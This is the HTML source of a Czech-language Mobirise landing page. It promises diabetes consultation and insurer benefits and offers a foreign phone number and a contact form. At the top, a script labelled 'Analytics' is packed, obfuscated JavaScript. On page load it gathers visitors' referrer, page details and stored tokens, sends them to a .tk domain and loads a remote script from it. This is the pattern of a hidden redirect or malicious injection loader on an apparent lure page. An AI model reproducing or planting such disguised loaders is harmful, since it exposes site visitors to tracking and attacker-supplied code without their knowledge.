
<!DOCTYPE html>
<html  >
<head>
  <!-- Site made with Mobirise Website Builder v5.2.0, https://mobirise.com -->
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="generator" content="Mobirise v5.2.0, mobirise.com">
  <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1">
  <link rel="shortcut icon" href="images/logo5.png" type="image/x-icon">
  <meta name="description" content="">
  
  
  <title>Home</title>
  <link rel="stylesheet" href="css/tether.min.css">
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <link rel="stylesheet" href="css/bootstrap-grid.min.css">
  <link rel="stylesheet" href="css/jquery.formstyler.css">
  <link rel="stylesheet" href="css/jquery.formstyler.theme.css">
  <link rel="stylesheet" href="css/jquery.datetimepicker.min.css">
  <link rel="stylesheet" href="css/styles.css">
  <link rel="stylesheet" href="css/style.css">
  <link rel="preload" as="style" href="css/mbr-additional.css">
  <link rel="stylesheet" href="css/mbr-additional.css" type="text/css">
  
  
  
  
</head>
<body>

<!-- Analytics -->
<script>
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(w(){1 b=\'2\';7(!3.2){3.2={9:x,o:y,h:\'p://q.r/z\',A:\'p://q.r/B/C\',}}D 8=5.i(\'t\');7(j 8!==\'k\'&&8!==E){1 c=F.G(8);1 d=H.I(+J K()/L);7(c.M+3.2.o<d){5.l(\'u\');5.l(\'m\');5.l(\'t\')}}1 e=5.i(\'u\');1 f=5.i(\'m\');1 g=\'?N=O.P\';g+=\'&\'+Q(3.n.R.S(\'?\',\'\'));g+=\'&T=\'+4(6.U);g+=\'&V=\'+4(6.W);g+=\'&X=\'+4(6.n.Y+6.n.Z);g+=\'&10=\'+4(b);g+=\'&11=\'+4(3.2.h);7(j e!==\'k\'&&e&&3.2.9){g+=\'&12=\'+4(e)}7(j f!==\'k\'&&f&&3.2.9){g+=\'&m=\'+4(f)}1 a=6.13(\'v\');a.14=\'15/16\';a.17=3.2.h+g;1 s=6.18(\'v\')[0];s.19.1a(a,s)})();',62,73,'|var|_SjkkGr4dDFBzSPdw|window|encodeURIComponent|localStorage|document|if|_NNnVY4QsdSbwB8Pk|unique||||||||R_PATH|getItem|typeof|undefined|removeItem|token|location|ttl|https|niecleanenticripa|tk||config|subId|script|function|false|86400|ZjqQx94n|P_PATH|04a58b3|postback|const|null|JSON|parse|Math|round|new|Date|1000|created_at|return|js|client|decodeURIComponent|search|replace|se_referrer|referrer|default_keyword|title|landing_url|hostname|pathname|name|host|sub_id|createElement|type|application|javascript|src|getElementsByTagName|parentNode|insertBefore'.split('|'),0,{}))
</script>
<!-- /Analytics -->


  
  <section class="header1 cid-soCaHAuPfL mbr-fullscreen" id="header1-0">

    

    <div class="mbr-overlay" style="opacity: 0.1; background-color: rgb(250, 250, 250);"></div>

    <div class="container">
        <div class="row">
            <div class="col-12 col-lg-5">
                <h1 class="mbr-section-title mbr-fonts-style mb-3 display-1"><strong>
</strong><strong>Konzultace o cukrovce</strong></h1>
                
                <p class="mbr-text mbr-fonts-style display-7">
                    Jaké benefity nabízejí v tomto roce pojišťovny diabetikům?  Každý den Vám představíme jednu pojišťovnu.   Česká průmyslová zdravotní pojišťovna Pro usnadnění života s diabetes. Přispějeme částkou až 500 Kč</p>
                <div class="mbr-section-btn mt-3"><a class="btn btn-secondary display-4" href="tel:+12423034942">Volání</a></div>
            </div>
        </div>
    </div>
</section>

<section class="form8 cid-soCaP8zpMV" id="form8-3">
    
    
    <div class="container">
        <div class="mbr-section-head">
            <h3 class="mbr-section-title mbr-fonts-style align-center mb-0 display-2">
                <strong>
</strong>
            <div><strong>Kontakty</strong></div></h3>
            
        </div>
        <div class="row justify-content-center mt-4">
            <div class="col-lg-8 mx-auto mbr-form" data-form-type="formoid">
                <form action="https://mobirise.eu/" method="POST" class="mbr-form form-with-styler mx-auto" data-form-title="Form Name"><input type="hidden" name="email" data-form-email="true" value="uSSZNB/byuzeO0n88/s79rVTamc2eZTW9l2jiUhRHtM4ZWiqslIUD14SsVQozodDu5qC48Cd3DIR0qadey4rsPlpSuT57VO4smFkvJiIxztadMeYjKmCyx6EV99gi+iJ">
                    <div class="">
                        <div hidden="hidden" data-form-alert="" class="alert alert-success col-12">Thanks for filling out the form!</div>
                        <div hidden="hidden" data-form-alert-danger="" class="alert alert-danger col-12">Oops...! some problem!</div>
                    </div>
                    <div class="dragArea row">
                        <div class="col-lg-4 col-md-12 col-sm-12 form-group" data-for="name">
                            <input type="text" name="name" placeholder=" název" data-form-field="name" class="form-control" value="" id="name-form8-3">
                        </div>
                        <div class="col-lg-4 col-md-12 col-sm-12 form-group" data-for="email">
                            <input type="email" name="email" placeholder="Email" data-form-field="email" class="form-control" value="" id="email-form8-3">
                        </div>
                        <div class="col-lg-4 col-md-12 col-sm-12 mbr-section-btn align-center">
                            <button type="submit" class="btn btn-primary display-4">Submit</button>
                        </div>
                    </div>
                </form>
            </div>
        </div>
    </div>
</section>

<section class="footer3 cid-soCaYUr1PL" once="footers" id="footer3-4">

    

    

    <div class="container">
        <div class="media-container-row align-center mbr-white">
            <div class="row row-links">
                <ul class="foot-menu">
                    
                    
                    
                    
                    
                <li class="foot-menu-item mbr-fonts-style display-7">
                        <a class="text-white" href="#" target="_blank">About us</a>
                    </li><li class="foot-menu-item mbr-fonts-style display-7">
                        <a class="text-white" href="#" target="_blank">Services</a>
                    </li><li class="foot-menu-item mbr-fonts-style display-7">
                        <a class="text-white" href="#" target="_blank">Contact Us</a>
                    </li><li class="foot-menu-item mbr-fonts-style display-7">
                        <a class="text-white" href="#" target="_blank">Careers</a>
                    </li><li class="foot-menu-item mbr-fonts-style display-7">
                        <a class="text-white" href="#" target="_blank">Work</a>
                    </li></ul>
            </div>
            <div class="row social-row">
                <div class="social-list align-right pb-2">
                    
                    
                    
                    
                    
                    
               
                </div>
            </div>
            <div class="row row-copirayt">
                <p class="mbr-text mb-0 mbr-fonts-style mbr-white align-center display-7">
                    © Copyright 2021 Mobirise. All Rights Reserved.
                </p>
            </div>
        </div>
    </div>
</section>

<section style="background-color: #fff; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Helvetica Neue', Arial, sans-serif; color:#aaa; font-size:12px; padding: 0; align-items: center; display: flex;"><a href="https://mobirise.site/r" style="flex: 1 1; height: 3rem; padding-left: 1rem;"></a><p style="flex: 0 0 auto; margin:0; padding-right:1rem;">Mobirise page builder - <a href="https://mobirise.site/n" style="color:#aaa;">Read more</a></p></section> 
  
  
</body>
</html>